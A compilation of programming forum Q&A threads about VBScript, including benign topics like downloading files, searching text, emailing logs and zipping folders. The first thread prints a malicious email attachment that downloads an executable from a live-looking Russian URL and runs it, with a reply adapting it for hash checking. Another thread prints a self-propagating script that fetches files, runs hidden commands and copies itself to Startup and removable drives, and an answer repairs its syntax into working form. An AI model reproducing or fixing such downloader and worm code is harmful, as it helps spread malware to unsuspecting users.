someone sent me an email with a vbs script, but I don't know what it is as I don't know vbs.
I am guessing this is a swindle to extort some data from me, but I can't really tell what data. Can someone please exlpain what would that scrtipt do?
Sub HTTPUpload( myURL, myPath )
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
As the other guy stated, it could very well be a virus. It's downloading binary data, writing it as an EXE and firing itself off.. You could modify it with this code below. ... You could also just delete the email and forget that dude. I know not "Everyone" is as crazy as some of us when it comes to finding viruses in the wild.. we hoard these things and study them.
I've amended some changes that would provide you with a MD5 Hash and SHA256 Hash that's searchable on VirusTotal and delete the file immediately after. You just need to re-append that line for httpUpload... and it will download... but if you see below I removed the line that was attempting to use the .Run method.
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
The link you provided is cut off, but if you still have the vbs file, then just remove that whole section of Sub HttpUpload thru End Sub which was right before it... Replace the entire content of the vbs file except for that line mentioned above.
Sub HTTPUpload( myURL, myPath )
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
wscript.echo " MD5Hash: " & MD5Hash(sPath) & VbCrLf & " SHA256Hash: " & Sha256Hash(sPath)
Set objShell = Nothing
End Sub
Function MD5Hash(sPath)
MD5Hash = bytesToHex(MD5HashBytes(GetBytes(sPath)))
End Function
Function Sha256Hash(sPath)
Sha256Hash = bytesToHex(Sha256HashBytes(GetBytes(sPath)))
End Function
Function MD5HashBytes(aBytes)
Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
objmd5.Initialize()
MD5HashBytes = objmd5.ComputeHash_2( (aBytes) )
End Function
Function Sha256HashBytes(aBytes)
'Set objsha256 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed")
objsha256.Initialize()
Sha256HashBytes = objsha256.ComputeHash_2( (aBytes) )
End Function
Function StringtoUTFBytes(aString)
Set UTF8 = CreateObject("System.Text.UTF8Encoding")
StringtoUTFBytes = UTF8.GetBytes_4(aString)
End Function
Function BytesToHex(aBytes)
For x = 1 to LenB(aBytes)
hexStr=Hex(Ascb(MidB((aBytes), x, 1)))
if len(hexStr) = 1 Then hexStr ="0" & hexStr
bytesToHex=BytesToHex & hexStr
Next
End Function
Function BytesToBase64(varBytes)
With CreateObject("MSXML2.DomDocument").CreateElement("b64")
.dataType = "bin.base64"
.nodeTypedValue = varBytes
BytesToBase64 = .Text
End With
End Function
Function GetBytes(sPath)
With CreateObject("ADODB.Stream")
.Type = 1
.open
.LoadFromFile sPath
.Position = 0
GetBytes = .Read
.Close
End With
End Function
Related
Credit to #Hackoo for the code below. I don't really know what's wrong with it, but it doesn't seem to wanna download the file (http://mollernielsen.eu/AutomaticShutdown/test.bat), which doesn't really make sense to me.
path = "http://mollernielsen.eu/AutomaticShutdown/test.bat"
pos = InStrRev(path, "/") +1
Const DownloadDest = "http://mollernielsen.eu/AutomaticShutdown/test.bat"
LocalFile = Mid(path, pos)
Const webUser = "admin"
Const webPass = "admin"
Const DownloadType = "binary"
dim strURL
function getit()
dim xmlhttp
set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
'xmlhttp.SetOption 2, 13056 'If https -) Ignorer toutes les erreurs SSL
strURL = DownloadDest
'Pour l'authentification de base, utilisez la liste ci-dessous, ainsi que les variables + d'utilisateurs? laisser passer
'xmlhttp.Open "GET", strURL, false, WebUser, WebPass
xmlhttp.Open "GET", strURL, false
xmlhttp.Send
If xmlhttp.Status = 200 Then
Dim objStream
set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1 'adTypeBinary
objStream.Open
objStream.Write xmlhttp.responseBody
objStream.Close
set objStream = Nothing
End If
set xmlhttp=Nothing
End function
getit()
I have no clue what is wrong with the code, it seems to start, but no file is saved and there are no errors.
Try like this :
Option Explicit
Dim URL
URL = "http://mollernielsen.eu/AutomaticShutdown/test.bat"
Call DownloadingFile(URL)
'*************************************************************************************************
Sub DownloadingFile(URL)
On Error Resume Next
Dim objFSO,Ws,objXMLHTTP,PathScript,Tab,strHDLocation,objADOStream,File,ProtocoleHTTP
Set objFSO = Createobject("Scripting.FileSystemObject")
Set Ws = CreateObject("wscript.Shell")
PathScript = objFSO.GetParentFolderName(wscript.ScriptFullName) 'Path of this Vbscript
ProtocoleHTTP = "http://"
If URL = "" Then WScript.Quit
If Left(URL,7) <> ProtocoleHTTP Then
URL = ProtocoleHTTP & URL
End if
Tab = split(url,"/")
File = Tab(UBound(Tab))
File = Replace(File,"%20"," ")
File = Replace(File,"%28","(")
File = Replace(File,"%29",")")
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP.3.0")
strHDLocation = PathScript & "\" & File
objXMLHTTP.open "GET",URL,false
objXMLHTTP.send()
If Err.number <> 0 or objXMLHTTP.Status <> 200 Then
MsgBox err.description & objXMLHTTP.Status,16,err.description & objXMLHTTP.Status
Exit Sub
Else
If objXMLHTTP.Status = 200 Then
strHDLocation = PathScript & "\" & File
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
objADOStream.SaveToFile strHDLocation,2
objADOStream.Close
Set objADOStream = Nothing
End If
End if
Set objXMLHTTP = Nothing
ws.Popup "The Download of " & Dblquote(File) & " is finished ! ","5","The Download of " & Dblquote(File) & " is finished !" ,64
End Sub
'**********************************************************************************************
Function DblQuote(Str)
DblQuote = Chr(34) & Str & Chr(34)
End Function
'**********************************************************************************************
There's no actual SaveToFile method called in the script, but there should be. The stream is being saved to an object in memory, but never written to disk. Stick this above objStream.Close:
objStream.SaveToFile "test.bat", 2
Please advice how changes the current single incoming log file to search multiple files.
Dim strTextToFind, strInputFile, strOutputFile, boolMatchCaseSensitive
Dim objFSO, objInputFile, strFoundText, strLine, objOutputFile
strTextToFind = Inputbox("Enter the text you would like to search for.")
strInputFile = "C:\Users\mmmanima\Desktop\mani\Day_16.txt"
iF YOU CAN NOTICED, IM ONLY ACCESS THE day_16 FILE
strOutputFile = "C:\Users\mmmanima\Desktop\texting As\result.txt"
Set objFSO = CreateObject("Scripting.FilesystemObject")
Const intForReading = 1
Const intForWriting = 2
Const intForAppending = 8
Set objInputFile = objFSO.OpenTextFile(strInputFile, intForReading, False)
Do until objInputFile.atEndOfStream
strLine = objInputFile.ReadLine
If InStr(strLine,strTextToFind) > 0 Then
strFoundText = strLine
If strFoundText <> "" Then
Set objOutputFile = objFSO.OpenTextFile(strOutputFile,intForAppending, True)
objOutputFile.WriteLine strFoundText
objOutputFile.Close
Set objOutputFile = Nothing
End If
End If
loop
objInputFile.Close
Set objInputFile = Nothing
WScript.Quit
VBScript required to search userinput string into the share folder and there is 60 files.
As I believe you want to search through the all files in a particular folder. Then I suggest you to loop you action while all files are read
to do that it's easier to maintain sub or function
pseudo:
var inputFolder = ".\myfolder"
foreach file in the inputFolder
{
inputFile = file
searchIn(inputFile)
}
sub searchIn(inputFile)
{
'do your current works here
}
code:
This part will give you the all file names
Set fso = CreateObject("Scripting.FileSystemObject")
inputFldr = Replace(wscript.scriptfullname,wscript.scriptname,".\")
Set fldr = fso.getFolder(inputFldr)
For Each file In fldr.Files
'call to your function
Next
----------plese aware of typos------
Dim strTextToFind, strInputFile, strOutputFile, boolMatchCaseSensitive
Dim objFSO, objInputFile, strFoundText, strLine, objOutputFile
Set objFSO = CreateObject("Scripting.FileSystemObject")
inputFldr = Replace(wscript.scriptfullname,wscript.scriptname,".\")
Set fldr = objFSO.getFolder(inputFldr)
strTextToFind = Inputbox("Enter the text you would like to search for.")
For Each file In fldr.Files
yourFunctionName(file )
Next
sub yourFunctionName(inputFile)
strInputFile = inputFile
strOutputFile = ".\result.txt"
Const intForReading = 1
Const intForWriting = 2
Const intForAppending = 8
Set objInputFile = objFSO.OpenTextFile(strInputFile, intForReading, False)
Do until objInputFile.atEndOfStream
strLine = objInputFile.ReadLine
If InStr(strLine,strTextToFind) > 0 Then
strFoundText = strLine
If strFoundText <> "" Then
Set objOutputFile = objFSO.OpenTextFile(strOutputFile,intForAppending, True)
objOutputFile.WriteLine strFoundText
objOutputFile.Close
Set objOutputFile = Nothing
End If
End If
loop
objInputFile.Close
Set objInputFile = Nothing
end sub
WScript.echo "done"
WScript.Quit
You can try this vbscript, i added a function BrowseForFolder()
Option Explicit
Dim strTextToFind,inputFldr,strInputFile,strOutputFile,path,fldr
Dim objFSO, objInputFile,strFoundText,strLine,objOutputFile,file,ws
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("wscript.Shell")
path = objFSO.GetParentFolderName(wscript.ScriptFullName)
strOutputFile = path & "\result.txt"
If objFSO.FileExists(strOutputFile) Then
objFSO.DeleteFile(strOutputFile)
End if
inputFldr = BrowseForFolder()
Set fldr = objFSO.getFolder(inputFldr)
strTextToFind = Inputbox("Enter the text you would like to search for it !","Enter the text you would like to search for it !","wscript")
For Each file In fldr.Files
Call Search(file,strTextToFind)
Next
ws.run strOutputFile
'***************************************************************************************************************
Sub Search(inputFile,strTextToFind)
strInputFile = inputFile
Const intForReading = 1
Const intForWriting = 2
Const intForAppending = 8
Set objInputFile = objFSO.OpenTextFile(strInputFile,intForReading, False)
Do until objInputFile.atEndOfStream
strLine = objInputFile.ReadLine
If InStr(strLine,strTextToFind) > 0 Then
strFoundText = strLine
If strFoundText <> "" Then
Set objOutputFile = objFSO.OpenTextFile(strOutputFile,intForAppending, True)
objOutputFile.WriteLine "The Path of file ===> "& DblQuote(strInputFile) & VbCRLF &_
"String found "& DblQuote(strTextToFind) & " ===> "& DblQuote(strFoundText) & VbCRLF & String(100,"*")
objOutputFile.Close
Set objOutputFile = Nothing
End If
End If
loop
objInputFile.Close
Set objInputFile = Nothing
End sub
'***************************************************************************************************************
Function BrowseForFolder()
Dim ws,objFolder,Copyright
Set ws = CreateObject("Shell.Application")
Set objFolder = ws.BrowseForFolder(0,"Choose the folder to search on it ",1,"c:\Programs")
If objFolder Is Nothing Then
Wscript.Quit
End If
BrowseForFolder = objFolder.self.path
end Function
'****************************************************************************************************************
Function DblQuote(Str)
DblQuote = Chr(34) & Str & Chr(34)
End Function
'*****************************************************
A bit late in the day after such a long time gap to address Mara Raj's problem with Hackoo's script but here it is for any others who may be interested. On starting the script it automatically deletes any existing result.txt file. Should the script subsequently go on to find "no match" it fails to generate a results.txt file as it would normally do if there were a match. The simplest way to correct this is to insert:
If objFSO.FileExists(strOutputFile) Then
else
wscript.echo "No Matches Found"
wscript.Quit
end if
between "next" and "ws.run strOutputFile"
i'm learning vbs. and i've found this code in internet. Tried to run it but it won't start. replaced some personal data with adresssss fileeee and commandddd
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
Set fs = CreateObject("Scripting.FileSystemObject")
Path = WshShell.SpecialFolders("Startup")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "adressssssssss", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "fileeeee", 2 '//overwrite
End with
dim xHttpa: Set xHttpa = createobject("Microsoft.XMLHTTP")
dim bStrma: Set bStrma = createobject("Adodb.Stream")
xHttpa.Open "GET", "adressss", False
xHttpa.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "fileeee", 2 '//overwrite
End with
Dim objWshae
Set objWshae = CreateObject( "WScript.Shell" )
objWshae.Run "commandddd" , 0 , 0
Set(objWshae)=Nothing
Dim objWsh
Set objWsh = CreateObject( "WScript.Shell" )
objWsh.Run "command" , 0 , 0
Set(objWsh)=Nothing
Dim objWsha
Set objWsha = CreateObject( "WScript.Shell" )
objWsha.Run "command" , 0 , 0
Set(objWsha)=Nothing
Start()
Function Start()
X = fs.CopyFile("NX21.vbs", Path & "\", True)
Set dc = fs.Drives
For Each d in dc
If (d.DriveType = 1) Then
s = d.DriveLetter
X = fs.CopyFile("NX21.vbs", s & ":\", True)
Else
End
If
Next
Else
End
If
WScript.Sleep 300000
Start()
End Function
and this code won't run?! it gives error "End expected"
Control statements have to be properly nested. So even if you add the missing conditional,
For Each d in dc
If (d.DriveType = 1) Then
s = d.DriveLetter
X = fs.CopyFile("NX21.vbs", s & ":\", True)
Else
whatever
End
If whatever Then
Next
is illegal. If you'd use proper indentation, atrocities like the above would be obvious.
On second reading: Perhaps you meant:
For Each d in dc
If (d.DriveType = 1) Then
s = d.DriveLetter
X = fs.CopyFile("NX21.vbs", s & ":\", True)
Else
whatever
End If ' <-- on one line please!
Next
In general: The "End X" phrases must be on one line.
It seems you don't understand what you are doing. Try to get some basic understanding of VBScript. Do not use On error resume next because that will hide errors from you. Try to understand conditional statements, reuse objects like the Wscript.Shell, AdoDB stream and XHTTP object, set objects to Nothing the correct way, assign variables correctly, use function calls properly. Use Option Explicit.
This is how your script should look like (without testing it, just syntactical):
Option Explicit
Dim WshShell, Path, xHttp, bStrm
Set WshShell = CreateObject("WScript.Shell")
Path = WshShell.SpecialFolders("Startup")
Set xHttp = createobject("Microsoft.XMLHTTP")
Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "adressssssssss", False
xHttp.Send
bStrm.type = 1 '//binary
bStrm.open
bStrm.write xHttp.responseBody
bStrm.savetofile "fileeeee", 2 '//overwrite
xHttp.Open "GET", "adressss", False
xHttp.Send
bStrm.type = 1 '//binary
bStrm.open
bStrm.write xHttp.responseBody
bStrm.savetofile "fileeee", 2 '//overwrite
Dim objWsh
Set objWsh = CreateObject( "WScript.Shell" )
objWsh.Run "commandddd", 0, 0
objWsh.Run "command", 0, 0
objWsh.Run "command", 0, 0
Call Start()
Function Start()
Dim dc, fs, d, s
Set fs = CreateObject("Scripting.FileSystemObject")
fs.CopyFile "NX21.vbs", Path & "\", True
Set dc = fs.Drives
For Each d in dc
If d.DriveType = 1 Then
s = d.DriveLetter
fs.CopyFile "NX21.vbs", s & ":\", True
Else
' The drivetype was not of a removable type
End If
Next
WScript.Sleep 300000
Call Start() ' <-- Ah, how appropriate, a risk on a Stack Overflow
End Function
Note on the last comment:
You are calling the Start() function from inside the Start() function, creating a non exitable recursive loop. After a few hundreds of thousands iterations you will get a Stack overflow error. Luckily you wait 300 seconds for each iteration so it will take several years to get to that.
Better to put the first call of the Start function (outside the function itself) in a do / loop construct:
Do
Call Start()
WScript.Sleep 300000
Loop
I'm getting 'variable is undefined', I'm guessing this has something to do with the scope of variables in vbscript, but my knowledge is limited with this.
I know the loading of the email addresses works and the actual emailing because I have checked these separately. I'm trying to loop through a list of email addresses and send the log file to each..
Any additional information would be great!
First, there is a var array at the top of the file:
dim emails()
function getEmailAddresses()
dim objFSO
dim objConfigFile
dim strLine
dim iCounter
const ForReading = 1, ForWriting = 2, ForAppending = 8
set objFSO = createobject("Scripting.FileSystemObject")
set objConfigFile = objFSO.OpenTextFile("emailAddresses.config", ForReading)
iCounter = 0
do while not objConfigFile.AtEndOfStream
redim preserve emails(iCounter)
strLine = trim(objConfigFile.ReadLine)
emails(iCounter) = strLine
iCounter = iCounter + 1
loop
objConfigFile.Close
end function
function writetolog(strLogtext)
dim objFSO
dim objLogfile
const ForReading = 1, ForWriting = 2, ForAppending = 8
set objFSO = createobject("Scripting.FileSystemObject")
set objLogfile = objFSO.OpenTextFile("xxx.log", ForAppending, true)
objLogfile.Writeline now() & " - " & strLogText
objLogfile.Close
call EmailLogFile(strLogText)
end function
function EmailLogFile(bodyText)
for each emailAddress in emails
set objEmail = CreateObject("CDO.Message")
objEmail.From = "File.Mover#xxxxxxx.xxx"
objEmail.To = emailAddress
objEmail.Subject = "File Move Log"
objEmail.Textbody = bodyText
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = _
"xxxxxx"
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
objEmail.Configuration.Fields.Update
objEmail.Send
next
end function
It doesn't look like you're calling getEmailAddresses() anywhere so your file won't be read and your emails array won't be populated
What line is the undefined var at? Or what is the var name?
Either way, 'strLogText' is not defined anywhere. Also, if this is a classic ASP page put an Option Explicit statement at the top.
Does anyone know of a method to determine when a file copy completes in VBScript? I'm using the following to copy:
set sa = CreateObject("Shell.Application")
set zip = sa.NameSpace(saveFile)
set Fol = sa.NameSpace(folderToZip)
zip.copyHere (Fol.items)
Do Until zip.Items.Count = Fol.Items.Count
WScript.Sleep 300
Loop
When the loop finishes your copy is finished.
But if you only want to copy and not zip, FSO or WMI is better.
If you are zipping and want them in a file you have to create the zip-file yourself, with the right header first. Else you only get compressed files/folders IIRC. Something like this:
Set FSO = CreateObject( "Scripting.FileSystemObject" )
Set File = FSO.OpenTextFile( saveFile, 2, True )
File.Write "PK" & Chr(5) & Chr(6) & String( 18, Chr(0) )
File.Close
Set File = Nothing
Set FSO = Nothing
The 2 in OpenTextFile is ForWriting.
You may have better luck using the Copy method on a FileSystemObject. I've used it for copying, and it's a blocking call.
Const FOF_CREATEPROGRESSDLG = &H0&
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = CreateObject("Scripting.FileSystemObject")
strSource = " " ' Source folder path of log files
strTarget = " .zip" ' backup path where file will be created
AddFilesToZip strSource,strTarget
Function AddFilesToZip (strSource,strTarget)
Set r=fso.GetFolder(strSource)
set file = fso.opentextfile(strTarget,ForWriting,true)
file.write "PK" & chr(5) & chr(6) & string(18,chr(0))
file.Close
Set shl = CreateObject("Shell.Application")
i = 0
For each f in r.Files
If fso.GetExtensionName(f) = "log" Or fso.GetExtensionName(f) = "Log" Or fso.GetExtensionName(f) = "LOG" Then
shl.namespace(strTarget).copyhere(f.Path)', FOF_CREATEPROGRESSDLG
Do until shl.namespace(strTarget).items.count = i
wscript.sleep 300
Loop
End If
i = i + 1
Next
set shl = Nothing
End Function